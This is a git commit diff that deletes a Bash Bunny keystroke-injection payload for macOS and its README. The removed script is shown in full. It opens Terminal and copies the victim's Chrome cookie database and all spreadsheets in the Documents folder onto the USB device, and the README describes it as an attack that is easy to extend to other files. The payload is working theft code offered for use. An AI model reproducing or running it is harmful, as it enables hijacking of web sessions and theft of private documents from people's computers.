pull/27/head
kmakblob 2017-03-08 19:38:52 -05:00
parent 4af04427aa
commit 0f2a390fb1
2 changed files with 0 additions and 53 deletions

View File

@ -1,33 +0,0 @@
LED R
ATTACKMODE HID STORAGE
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 8000
QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER
# Green LED for finished
LED G
files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0"]
then
# Got spreadsheet files
LED R B
else
LED R
# No spread sheets
fi

View File

@ -1,20 +0,0 @@
# Mac Info Grabber for the BashBunny
* Author: kmakblob
* Version: Version 1.0
* Target: OSX
## Description
A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
the Documents folder and places them inside a folder on the BashBunny called MacLoot.
This payload can be easily modified to grab other files like word docs or csv files.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Attack Finished |
| Purple | Successfully grabbed xls or xlsx files |
| RED | Did not get any xls or xlsx files |